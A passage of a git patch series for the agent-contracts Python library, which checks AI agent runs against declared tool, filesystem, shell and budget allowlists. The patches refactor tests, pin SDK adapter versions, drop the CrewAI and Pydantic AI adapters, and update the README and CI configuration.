test_postcondition_evaluation(self, enforcer_tier1) -> None: - results = enforcer_tier1.evaluate_postconditions({"status": "ok"}) - assert len(results) == 1 - assert results[0].passed is True + assert enforcer_tier1.validate_output({"result": "answer"}) == [] def test_violations_accumulated(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) events = [] - enforcer = ContractEnforcer( - contract, violation_destination="callback", violation_callback=lambda e: events.append(e) - ) - try: + enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: events.append(e)) + with pytest.raises(ContractViolation): enforcer.check_tool_call("unauthorized_tool") - except ContractViolation: - pass assert len(enforcer.violations) == 1 + assert len(events) == 1 - def test_context_manager(self, tmp_yaml, tier1_data) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) - with ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) as enforcer: - enforcer.check_tool_call("search") + def test_context_manager_finalizes(self, tmp_yaml, coding_contract_data, tmp_path: Path) -> None: + contract = load_contract(tmp_yaml(coding_contract_data)) + with ContractEnforcer(contract, repo_root=tmp_path) as enforcer: + enforcer.record_check("pytest", "pass", exit_code=0) + enforcer.record_check("ruff", "pass", exit_code=0) + enforcer.finalize_run(output={"status": "done"}) + assert enforcer.artifact_path is not None + assert enforcer.artifact_path.exists() def test_no_effects_allows_all(self, tmp_yaml, tier0_data) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) - enforcer = ContractEnforcer(contract, violation_destination="callback", violation_callback=lambda e: None) - enforcer.check_tool_call("anything") # No effects configured = allow all + enforcer = ContractEnforcer(load_contract(tmp_yaml(tier0_data)), violation_destination="callback", violation_callback=lambda e: None) + enforcer.check_tool_call("anything") class TestEnforceContractDecorator: @@ -102,8 +166,7 @@ def test_decorator_basic(self, tmp_yaml, tier0_data) -> None: def my_agent(query: str, _enforcer: Any = None) -> str: return "result" - result = my_agent("hello") - assert result == "result" + assert my_agent("hello") == "result" def test_decorator_postcondition_fail(self, tmp_yaml) -> None: data = { @@ -121,7 +184,5 @@ def test_decorator_postcondition_fail(self, tmp_yaml) -> None: def bad_agent(query: str, _enforcer: Any = None) -> None: return None - from agent_contracts.postconditions import PostconditionError - with pytest.raises(PostconditionError): bad_agent("hello") diff --git a/tests/test_init_from_trace.py b/tests/test_init_from_trace.py index d7a8e0f..66b7dcb 100644 --- a/tests/test_init_from_trace.py +++ b/tests/test_init_from_trace.py @@ -7,71 +7,72 @@ import yaml -from agent_contracts.init_from_trace import ( - generate_contract_from_traces, - generate_contract_yaml, -) +from agent_contracts.init_from_trace import generate_contract_from_traces, generate_contract_yaml class TestGenerateFromTraces: def _write_traces(self, tmp_path: Path, traces: list) -> Path: - p = tmp_path / "traces.jsonl" - p.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") - return p + path = tmp_path / "traces.jsonl" + path.write_text("\n".join(json.dumps(t) for t in traces), encoding="utf-8") + return path def test_extracts_tools(self, tmp_path: Path) -> None: traces = [ {"tool_calls": [{"name": "search"}, {"name": "database.read"}]}, {"tool_calls": [{"name": "search"}, {"name": "api.call"}]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) tools = result["effects"]["authorized"]["tools"] assert "search" in tools assert "database.read" in tools assert "api.call" in tools + def test_extracts_filesystem_and_shell(self, tmp_path: Path) -> None: + traces = [ + { + "filesystem": {"read": ["src/app.py"], "write": ["tests/test_app.py"]}, + "shell_commands": ["python -m pytest tests/test_app.py"], + } + ] + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) + authorized = result["effects"]["authorized"] + assert authorized["filesystem"]["read"] == ["src/**"] + assert authorized["filesystem"]["write"] == ["tests/**"] + assert authorized["shell"]["commands"] == ["python -m pytest tests/test_app.py"] + def test_extracts_budgets(self, tmp_path: Path) -> None: traces = [ - {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, - "tool_calls": [{"name": "a"}, {"name": "b"}]}, - {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, - "tool_calls": [{"name": "a"}]}, + {"usage": {"cost_usd": 0.10, "total_tokens": 1000}, "duration_seconds": 5.0, "tool_calls": [{"name": "a"}, {"name": "b"}], "shell_commands": ["pytest"]}, + {"usage": {"cost_usd": 0.20, "total_tokens": 2000}, "duration_seconds": 10.0, "tool_calls": [{"name": "a"}], "shell_commands": ["pytest", "ruff"]}, ] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) budgets = result["resources"]["budgets"] - assert budgets["max_cost_usd"] == 0.24 # 0.20 * 1.2 - assert budgets["max_tokens"] == 2400 # 2000 * 1.2 + assert budgets["max_cost_usd"] == 0.24 + assert budgets["max_tokens"] == 2400 + assert budgets["max_shell_commands"] == 3 def test_extracts_identity(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "my-agent", "version": "2.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, traces)) assert result["identity"]["name"] == "my-agent" assert result["identity"]["version"] == "2.0.0" def test_name_override(self, tmp_path: Path) -> None: traces = [{"agent": {"name": "original", "version": "1.0.0"}, "tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path, agent_name="override") + result = generate_contract_from_traces(self._write_traces(tmp_path, traces), agent_name="override") assert result["identity"]["name"] == "override" def test_always_has_postcondition(self, tmp_path: Path) -> None: - traces = [{"tool_calls": []}] - path = self._write_traces(tmp_path, traces) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [{"tool_calls": []}])) assert len(result["contract"]["postconditions"]) >= 1 def test_yaml_output(self, tmp_path: Path) -> None: traces = [{"tool_calls": [{"name": "search"}], "usage": {"cost_usd": 0.01, "total_tokens": 100}}] - path = self._write_traces(tmp_path, traces) - yaml_str = generate_contract_yaml(path) - parsed = yaml.safe_load(yaml_str) + parsed = yaml.safe_load(generate_contract_yaml(self._write_traces(tmp_path, traces))) assert parsed["agent_contract"] == "0.1.0" + assert parsed["observability"]["run_artifact_path"] == ".agent-contracts/runs/{run_id}/verdict.json" def test_empty_traces(self, tmp_path: Path) -> None: - path = self._write_traces(tmp_path, []) - result = generate_contract_from_traces(path) + result = generate_contract_from_traces(self._write_traces(tmp_path, [])) assert result["identity"]["name"] == "unnamed-agent" - assert "effects" not in result # No tools observed + assert "effects" in result diff --git a/tests/test_loader.py b/tests/test_loader.py index cce2715..3078524 100644 --- a/tests/test_loader.py +++ b/tests/test_loader.py @@ -40,16 +40,13 @@ def test_non_mapping_yaml(self, tmp_path: Path) -> None: class TestValidateContract: def test_valid_tier0(self, tier0_data: Dict[str, Any]) -> None: - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] def test_valid_tier1(self, tier1_data: Dict[str, Any]) -> None: - errors = validate_contract(tier1_data) - assert errors == [] + assert validate_contract(tier1_data) == [] def test_valid_tier2(self, tier2_data: Dict[str, Any]) -> None: - errors = validate_contract(tier2_data) - assert errors == [] + assert validate_contract(tier2_data) == [] def test_missing_identity(self) -> None: data = { @@ -57,7 +54,7 @@ def test_missing_identity(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("identity" in e for e in errors) + assert any("identity" in error for error in errors) def test_missing_postconditions(self) -> None: data = { @@ -66,7 +63,7 @@ def test_missing_postconditions(self) -> None: "contract": {"postconditions": []}, } errors = validate_contract(data) - assert any("postconditions" in e for e in errors) + assert any("postconditions" in error for error in errors) def test_invalid_version_format(self) -> None: data = { @@ -75,18 +72,16 @@ def test_invalid_version_format(self) -> None: "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } errors = validate_contract(data) - assert any("agent_contract" in e for e in errors) + assert any("agent_contract" in error for error in errors) def test_x_extension_allowed(self, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom-field"] = {"hello": "world"} - errors = validate_contract(tier0_data) - assert errors == [] + assert validate_contract(tier0_data) == [] class TestLoadContract: def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.tier == 0 assert contract.identity.name == "test-agent" assert contract.identity.version == "1.0.0" @@ -94,17 +89,20 @@ def test_load_tier0(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: assert contract.postconditions[0].name == "has_output" def test_load_tier1(self, tmp_yaml, tier1_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier1_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier1_data)) assert contract.tier == 1 assert contract.budgets is not None assert contract.budgets.max_cost_usd == 0.50 + assert contract.budgets.max_shell_commands == 5 assert contract.effects_authorized is not None assert "search" in contract.effects_authorized.tools + assert contract.effects_authorized.filesystem is not None + assert contract.effects_authorized.filesystem.write == ["src/**", "tests/**"] + assert contract.effects_authorized.shell is not None + assert "python -m pytest *" in contract.effects_authorized.shell.commands def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: - path = tmp_yaml(tier2_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier2_data)) assert contract.tier == 2 assert contract.failure_model is not None assert len(contract.failure_model.errors) == 2 @@ -114,6 +112,13 @@ def test_load_tier2(self, tmp_yaml, tier2_data: Dict[str, Any]) -> None: assert contract.slo is not None assert contract.slo.contract_satisfaction_rate is not None assert contract.slo.contract_satisfaction_rate.target == 0.995 + assert contract.observability is not None + assert contract.observability.run_artifact_path == ".agent-contracts/runs/{run_id}/verdict.json" + + def test_source_path_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: + path = tmp_yaml(tier0_data) + contract = load_contract(path) + assert contract.source_path == str(path.resolve()) def test_strict_validation_raises(self, tmp_yaml) -> None: bad_data = {"agent_contract": "bad", "identity": {"name": "a"}} @@ -127,13 +132,11 @@ def test_non_strict_returns_partial(self, tmp_yaml) -> None: "identity": {"name": "partial", "version": "0.0.1"}, "contract": {"postconditions": [{"name": "x", "check": "true"}]}, } - path = tmp_yaml(partial) - contract = load_contract(path, strict=False) + contract = load_contract(tmp_yaml(partial), strict=False) assert contract.identity.name == "partial" def test_raw_preserved(self, tmp_yaml, tier0_data: Dict[str, Any]) -> None: tier0_data["x-custom"] = "value" - path = tmp_yaml(tier0_data) - contract = load_contract(path) + contract = load_contract(tmp_yaml(tier0_data)) assert contract.raw is not None assert contract.raw["x-custom"] == "value" diff --git a/tests/test_postconditions.py b/tests/test_postconditions.py index b437be4..df9d875 100644 --- a/tests/test_postconditions.py +++ b/tests/test_postconditions.py @@ -32,10 +32,6 @@ def test_equality(self) -> None: assert evaluate_expression('output.status == "resolved"', ctx) is True assert evaluate_expression('output.status == "failed"', ctx) is False - def test_inequality(self) -> None: - ctx = {"output": {"status": "resolved"}} - assert evaluate_expression('output.status != "failed"', ctx) is True - def test_numeric_comparison(self) -> None: ctx = {"output": {"score": 0.85}} assert evaluate_expression("output.score >= 0.8", ctx) is True @@ -59,9 +55,10 @@ def test_nested_path(self) -> None: ctx = {"output": {"data": {"nested": {"value": 42}}}} assert evaluate_expression("output.data.nested.value == 42", ctx) is True - def test_missing_path_returns_false(self) -> None: - ctx = {"output": {}} - assert evaluate_expression("output.nonexistent is not None", ctx) is False + def test_logical_and_or(self) -> None: + ctx = {"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 1}}} + assert evaluate_expression("checks.pytest.exit_code == 0 and checks.ruff.exit_code == 1", ctx) is True + assert evaluate_expression("checks.pytest.exit_code == 1 or checks.ruff.exit_code == 1", ctx) is True def test_truthiness_fallback(self) -> None: assert evaluate_expression("output", {"output": "nonempty"}) is True @@ -84,27 +81,24 @@ def test_sync_warn_calls_callback(self) -> None: warnings: list = [] pcs = [PostconditionDef(name="warn_check", check='output == "good"', enforcement="sync_warn")] results = evaluate_postconditions(pcs, "bad", on_warn=lambda pc, o: warnings.append(pc.name)) - assert len(warnings) == 1 - assert warnings[0] == "warn_check" + assert warnings == ["warn_check"] assert results[0].passed is False - def test_async_monitor_deferred(self) -> None: - async_items: list = [] - pcs = [PostconditionDef(name="async_check", check="output > 0", enforcement="async_monitor")] - results = evaluate_postconditions(pcs, -1, on_async=lambda pc, o: async_items.append(pc.name)) - assert len(async_items) == 1 - # async_monitor always returns passed=True (deferred evaluation) - assert results[0].passed is True - def test_eval_judge_skipped(self) -> None: pcs = [PostconditionDef(name="judge", check="eval:quality_judge", enforcement="sync_block")] - results = evaluate_postconditions(pcs, "anything") - assert results[0].passed is True # Skipped, not evaluated + assert evaluate_postconditions(pcs, "anything")[0].passed is True - def test_multiple_postconditions(self) -> None: + def test_checks_context(self) -> None: pcs = [ - PostconditionDef(name="not_none", check="output is not None", enforcement="sync_block"), - PostconditionDef(name="has_data", check='output.status == "ok"', enforcement="sync_warn"), + PostconditionDef( + name="repo_checks_green", + check="checks.pytest.exit_code == 0 and checks.ruff.exit_code == 0", + enforcement="sync_block", + ) ] - results = evaluate_postconditions(pcs, {"status": "ok"}) - assert all(r.passed for r in results) + results = evaluate_postconditions( + pcs, + {"status": "done"}, + extra_context={"checks": {"pytest": {"exit_code": 0}, "ruff": {"exit_code": 0}}}, + ) + assert results[0].passed is True From a79615a40b14049bd98e2d720cf2c4efae2a1aa3 Mon Sep 17 00:00:00 2001 From: Piyush Vyas Date: Mon, 6 Apr 2026 15:58:03 -0500 Subject: [PATCH 2/4] feat(adapters): framework-agnostic core, real-SDK integration tests, pinned versions The contract, CLI, verdict artifact, and GitHub Action are framework- and provider-agnostic by design. The CI verdict gate is the source of truth for enforcement; in-runtime adapters are optional ergonomic helpers that forward host hook calls into the same enforcer. - pin claude-agent-sdk==0.1.56, openai-agents==0.13.5, langchain-core==1.2.26 in their respective extras - gate all three SDK extras on Python 3.10+ (core stays 3.9+) - fix OpenAI adapter import path (from agents import RunHooks) - add real-SDK integration tests using pytest.importorskip so adapters are validated against the actual installed SDK base classes / hook surfaces, not stub fallbacks - wire CI to install [claude,openai,langchain] extras on Python 3.10+ matrix entries so the integration tests run - mypy: skip following imports into framework SDKs (newer-Python syntax) - drop CrewAI and Pydantic AI adapters/extras/tests - README: lead with "CI verdict gate = source of truth", document pinned SDK versions, add v0.3.0 TypeScript adapter roadmap Co-Authored-By: Claude Opus 4.6 (1M context) --- .github/workflows/ci.yml | 6 +- CHANGELOG.md | 14 +- README.md | 22 +++- pyproject.toml | 27 ++-- src/agent_contracts/adapters/__init__.py | 13 +- src/agent_contracts/adapters/crewai.py | 105 --------------- src/agent_contracts/adapters/openai_agents.py | 2 +- src/agent_contracts/adapters/pydantic_ai.py | 121 ------------------ tests/test_adapters/test_claude_agent.py | 23 ++++ tests/test_adapters/test_crewai.py | 76 ----------- tests/test_adapters/test_langchain.py | 15 +++ tests/test_adapters/test_openai_agents.py | 29 +++++ tests/test_adapters/test_pydantic_ai.py | 58 --------- 13 files changed, 124 insertions(+), 387 deletions(-) delete mode 100644 src/agent_contracts/adapters/crewai.py delete mode 100644 src/agent_contracts/adapters/pydantic_ai.py delete mode 100644 tests/test_adapters/test_crewai.py delete mode 100644 tests/test_adapters/test_pydantic_ai.py diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml index bc49da6..79fb20d 100644 --- a/.github/workflows/ci.yml +++ b/.github/workflows/ci.yml @@ -17,8 +17,12 @@ jobs: - uses: actions/setup-python@v5 with: python-version: ${{ matrix.python-version }} - - name: Install dependencies + - name: Install core (3.9) + if: matrix.python-version == '3.9' run: pip install -e ".[dev]" + - name: Install core + adapter extras (3.10+) + if: matrix.python-version != '3.9' + run: pip install -e ".[dev,claude,openai,langchain]" - name: Lint run: python -m ruff check src/ tests/ - name: Type check diff --git a/CHANGELOG.md b/CHANGELOG.md index 5b314f8..384eb3d 100644 --- a/CHANGELOG.md +++ b/CHANGELOG.md @@ -2,7 +2,7 @@ All notable changes to this project are tracked here. -## [0.2.0] - 2026-04-02 +## [0.2.0] - 2026-04-06 ### Added @@ -13,8 +13,16 @@ All notable changes to this project are tracked here. - verdict artifact emission and CLI verdict gating - coding-agent trace bootstrap improvements - coding/build-focused demo contracts and CI action semantics +- real-SDK integration tests for Claude, OpenAI, and LangChain adapters (run against the pinned SDK versions in CI) ### Changed -- promoted the coding/build-agent guardrail work into the v0.2.0 release line -- clarified Claude/Codex/OpenAI integration limits around hard stops vs final CI gating +- positioned the contract + CLI + verdict artifact + GitHub Action as the framework-agnostic, provider-agnostic enforcement surface; the CI verdict gate is the source of truth +- pinned framework adapter SDKs to exact versions: `claude-agent-sdk==0.1.56`, `openai-agents==0.13.5`, `langchain-core==1.2.26` +- gated all three adapter extras on Python 3.10+ (core remains 3.9+) +- fixed the OpenAI adapter import path (`from agents import RunHooks`) + +### Removed + +- CrewAI adapter and `[crewai]` extra +- Pydantic AI adapter and `[pydantic-ai]` extra diff --git a/README.md b/README.md index 42069a1..22f55db 100644 --- a/README.md +++ b/README.md @@ -6,6 +6,10 @@ `agent-contracts` lets a repository declare what an agent may read, write, run, call, and spend — and then emit one durable verdict artifact showing whether the run passed, warned, blocked, or failed. +The contract, CLI, verdict artifact, and GitHub Action are **framework-agnostic and provider-agnostic by design** — they don't depend on any agent SDK or model provider. Optional adapters for Claude Agent SDK, OpenAI Agents SDK, and LangChain are thin ergonomic helpers that forward in-runtime hook calls into the same enforcer. + +> **The CI verdict gate is the source of truth.** The merge cannot go green if the verdict is `blocked` or `fail`. In-runtime adapters add convenience — the gate is what makes enforcement complete. + ```bash pip install aicontracts ``` @@ -152,19 +156,23 @@ python -m agent_contracts.cli init --template coding python -m agent_contracts.cli check-verdict .agent-contracts/runs//verdict.json ``` -## Host integrations +## Framework adapters (optional) -### Claude Code / Claude SDK +The core (contract, CLI, verdict artifact, GitHub Action) is framework-agnostic and provider-agnostic. Adapters are optional ergonomic helpers that wire in-runtime hook calls into the same enforcer. Each is pinned to a specific SDK version and tested against the real SDK in CI. -Claude is the strongest local hard-stop path in this repo today because it can deny tool use before execution through hooks. Use the repo contract as the source of truth, and map the contract's allowlists into Claude's hook surface where possible. +| Framework | Extra | Pinned SDK | +|---|---|---| +| Claude Agent SDK | `aicontracts[claude]` | `claude-agent-sdk==0.1.56` | +| OpenAI Agents SDK | `aicontracts[openai]` | `openai-agents==0.13.5` | +| LangChain | `aicontracts[langchain]` | `langchain-core==1.2.26` | -### Codex +All three SDK extras require Python 3.10+. The core package supports Python 3.9+. -Codex can use the same repo-local contract for enforcement in wrappers and for final CI gating via verdict artifacts. The contract file stays in the repo; CI becomes the final source of truth for merge readiness. +In-runtime adapters add hard-stop coverage where the host exposes a pre-execution hook, but enforcement completeness still depends on the host's hook surface. The CI verdict gate is what makes enforcement total: every merge runs the same evaluator against the same contract, regardless of which framework, model, or runtime produced the run. -### OpenAI Agents SDK +### v0.3.0 roadmap -The OpenAI adapter can block tool execution at `on_tool_start`, but cannot recover reasoning tokens already spent deciding to call the tool. The docs and adapter are explicit about that limit. +A companion `@aicontracts/*` TypeScript package with adapters for Vercel AI SDK, Claude TypeScript SDK, and OpenAI Agents JS is planned for v0.3.0. ## GitHub Action diff --git a/pyproject.toml b/pyproject.toml index 38534a5..57ed7c2 100644 --- a/pyproject.toml +++ b/pyproject.toml @@ -36,16 +36,12 @@ dependencies = [ [project.optional-dependencies] otel = ["opentelemetry-api>=1.20"] -langchain = ["langchain-core>=0.2"] -crewai = ["crewai>=0.50"] -pydantic-ai = ["pydantic-ai>=0.1"] -openai = ["openai-agents==0.8.4"] -claude = ["claude-agent-sdk==0.1.50; python_version>='3.10'"] +langchain = ["langchain-core==1.2.26; python_version>='3.10'"] +openai = ["openai-agents==0.13.5; python_version>='3.10'"] +claude = ["claude-agent-sdk==0.1.56; python_version>='3.10'"] all = [ "aicontracts[otel]", "aicontracts[langchain]", - "aicontracts[crewai]", - "aicontracts[pydantic-ai]", "aicontracts[openai]", "aicontracts[claude]", ] @@ -103,7 +99,22 @@ module = [ "jsonschema.*", "opentelemetry", "opentelemetry.*", - "openai_agents", +] +ignore_missing_imports = true + +# Framework SDKs may use newer-Python syntax (e.g. match statements) than +# the project's mypy target. Skip following imports into them so the +# adapter modules type-check against forward references only. +[[tool.mypy.overrides]] +module = [ + "agents", + "agents.*", + "langchain_core", "langchain_core.*", + "claude_agent_sdk", + "claude_agent_sdk.*", + "mcp", + "mcp.*", ] ignore_missing_imports = true +follow_imports = "skip" diff --git a/src/agent_contracts/adapters/__init__.py b/src/agent_contracts/adapters/__init__.py index cd5e596..c930a39 100644 --- a/src/agent_contracts/adapters/__init__.py +++ b/src/agent_contracts/adapters/__init__.py @@ -1,12 +1,11 @@ """Framework adapters for Agent Contracts. -Each adapter is a thin wrapper (<200 LOC) that maps framework-specific -hooks to the SDK's enforcement API. Install the corresponding extra -to use an adapter: +The contract, CLI, verdict artifact, and GitHub Action are framework- +agnostic by design — these adapters are optional ergonomic helpers that +forward in-runtime hook calls into the same enforcer. The CI verdict +gate is the source of truth. - pip install aicontracts[langchain] - pip install aicontracts[crewai] - pip install aicontracts[pydantic-ai] - pip install aicontracts[openai] pip install aicontracts[claude] # Python 3.10+ + pip install aicontracts[openai] + pip install aicontracts[langchain] """ diff --git a/src/agent_contracts/adapters/crewai.py b/src/agent_contracts/adapters/crewai.py deleted file mode 100644 index b84f5f5..0000000 --- a/src/agent_contracts/adapters/crewai.py +++ /dev/null @@ -1,105 +0,0 @@ -"""CrewAI adapter — contract enforcement for CrewAI agents and crews. - -Usage (3 lines): - from agent_contracts.adapters.crewai import ContractGuard - guard = ContractGuard.from_file("contract.yaml") - result = guard.execute(crew, inputs={"query": "..."}) -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, Dict, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractGuard: - """Wraps a CrewAI crew or agent with contract enforcement. - - Provides pre-execution input validation, tool call interception, - and post-execution output validation with postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractGuard": - """Create a guard from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def validate_inputs(self, inputs: Dict[str, Any]) -> List[str]: - """Validate inputs before crew execution.""" - return self._enforcer.validate_input(inputs) - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - self._enforcer.check_tool_call(tool_name) - - def validate_output(self, output: Any) -> List[str]: - """Validate output after crew execution.""" - errors = self._enforcer.validate_output(output) - self._enforcer.evaluate_postconditions(output) - return errors - - def execute(self, crew: Any, *, inputs: Optional[Dict[str, Any]] = None) -> Any: - """Execute a crew with contract enforcement. - - Validates inputs before execution and outputs/postconditions after. - """ - if inputs is not None: - input_errors = self.validate_inputs(inputs) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute the crew - result = crew.kickoff(inputs=inputs) - - # Post-execution validation - output = result if not hasattr(result, "raw") else result.raw - self._enforcer.validate_output(output if isinstance(output, dict) else {"result": output}) - self._enforcer.evaluate_postconditions(output) - - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/src/agent_contracts/adapters/openai_agents.py b/src/agent_contracts/adapters/openai_agents.py index 3519473..bba28ff 100644 --- a/src/agent_contracts/adapters/openai_agents.py +++ b/src/agent_contracts/adapters/openai_agents.py @@ -23,7 +23,7 @@ from agent_contracts.violations import ViolationEvent try: - from openai_agents import RunHooks + from agents import RunHooks except ImportError: # Stub so the module can be imported without openai-agents class RunHooks: # type: ignore[no-redef] diff --git a/src/agent_contracts/adapters/pydantic_ai.py b/src/agent_contracts/adapters/pydantic_ai.py deleted file mode 100644 index f2e89e4..0000000 --- a/src/agent_contracts/adapters/pydantic_ai.py +++ /dev/null @@ -1,121 +0,0 @@ -"""Pydantic AI adapter — contract enforcement for Pydantic AI agents. - -Usage (3 lines): - from agent_contracts.adapters.pydantic_ai import ContractMiddleware - middleware = ContractMiddleware.from_file("contract.yaml") - result = await middleware.run(agent, "user prompt") -""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Callable, List, Optional, Union - -from agent_contracts.enforcer import ContractEnforcer, ContractViolation -from agent_contracts.loader import load_contract -from agent_contracts.types import Contract -from agent_contracts.violations import ViolationEvent - - -class ContractMiddleware: - """Middleware that wraps Pydantic AI agent execution with contract enforcement. - - Intercepts tool calls for effect gating, tracks budgets, - and validates outputs against the contract schema and postconditions. - """ - - def __init__( - self, - contract: Contract, - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> None: - self._contract = contract - self._enforcer = ContractEnforcer( - contract, - violation_destination=violation_destination, - violation_callback=violation_callback, - ) - - @classmethod - def from_file( - cls, - path: Union[str, Path], - *, - violation_destination: str = "stdout", - violation_callback: Optional[Callable[[ViolationEvent], None]] = None, - ) -> "ContractMiddleware": - """Create middleware from a contract YAML file.""" - contract = load_contract(path) - return cls(contract, violation_destination=violation_destination, - violation_callback=violation_callback) - - @property - def enforcer(self) -> ContractEnforcer: - return self._enforcer - - @property - def violations(self) -> List[ViolationEvent]: - return self._enforcer.violations - - def check_tool(self, tool_name: str) -> None: - """Check if a tool is authorized by the contract.""" - self._enforcer.check_tool_call(tool_name) - - def validate_result(self, result: Any) -> List[str]: - """Validate agent result against contract.""" - output = result - if hasattr(result, "data"): - output = result.data - if hasattr(result, "output"): - output = result.output - - errors = self._enforcer.validate_output( - output if isinstance(output, dict) else {"result": output} - ) - self._enforcer.evaluate_postconditions(output) - return errors - - async def run(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Run a Pydantic AI agent with contract enforcement. - - Wraps agent.run() with pre/post validation. - """ - # Validate input - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - # Execute agent - result = await agent.run(prompt, **kwargs) - - # Validate output - self.validate_result(result) - - return result - - def run_sync(self, agent: Any, prompt: str, **kwargs: Any) -> Any: - """Synchronous version of run() for non-async contexts.""" - if self._contract.input_schema: - input_data = {"prompt": prompt, **kwargs} - input_errors = self._enforcer.validate_input(input_data) - if input_errors: - raise ContractViolation(f"Input validation failed: {input_errors}") - - result = agent.run_sync(prompt, **kwargs) - self.validate_result(result) - return result - - def wrap_tool(self, tool_fn: Callable[..., Any], tool_name: str) -> Callable[..., Any]: - """Wrap a tool function with contract enforcement.""" - - def wrapped(*args: Any, **kwargs: Any) -> Any: - self._enforcer.check_tool_call(tool_name) - return tool_fn(*args, **kwargs) - - wrapped.__name__ = tool_fn.__name__ - wrapped.__doc__ = tool_fn.__doc__ - return wrapped diff --git a/tests/test_adapters/test_claude_agent.py b/tests/test_adapters/test_claude_agent.py index 43e5b71..a90110c 100644 --- a/tests/test_adapters/test_claude_agent.py +++ b/tests/test_adapters/test_claude_agent.py @@ -113,3 +113,26 @@ def test_violations_accumulated(self, hooks) -> None: "tool_input": {}, })) assert len(hooks.violations) == 1 + + +class TestRealSDKIntegration: + """Verifies the hooks dict produced by the adapter is consumable by the + real claude-agent-sdk. Skipped if claude-agent-sdk is not installed + (it requires Python 3.10+).""" + + def test_hooks_config_accepted_by_sdk(self, hooks) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + config = hooks.get_hooks_config() + # Real SDK exposes ClaudeAgentOptions and accepts a hooks mapping. + options = sdk.ClaudeAgentOptions(hooks=config) + assert options.hooks is config + + def test_pre_tool_use_signature_matches_hookcallback(self) -> None: + sdk = pytest.importorskip("claude_agent_sdk") + # Adapter callbacks must accept (input_data, tool_use_id, context). + assert hasattr(sdk, "HookCallback") + import inspect + sig = inspect.signature(ContractHooks.pre_tool_use) + params = list(sig.parameters) + # self + 3 hook params + assert params[1:] == ["input_data", "tool_use_id", "context"] diff --git a/tests/test_adapters/test_crewai.py b/tests/test_adapters/test_crewai.py deleted file mode 100644 index 07ecc86..0000000 --- a/tests/test_adapters/test_crewai.py +++ /dev/null @@ -1,76 +0,0 @@ -"""Tests for CrewAI adapter.""" - -from __future__ import annotations - -from pathlib import Path -from typing import Any, Dict -from unittest.mock import MagicMock - -import pytest -import yaml - -from agent_contracts.adapters.crewai import ContractGuard -from agent_contracts.enforcer import ContractViolation - - -@pytest.fixture -def guard(tmp_path: Path, tier1_data: Dict[str, Any]) -> ContractGuard: - p = tmp_path / "contract.yaml" - p.write_text(yaml.dump(tier1_data, sort_keys=False), encoding="utf-8") - return ContractGuard.from_file(p, violation_destination="callback", - violation_callback=lambda e: None) - - -class TestContractGuard: - def 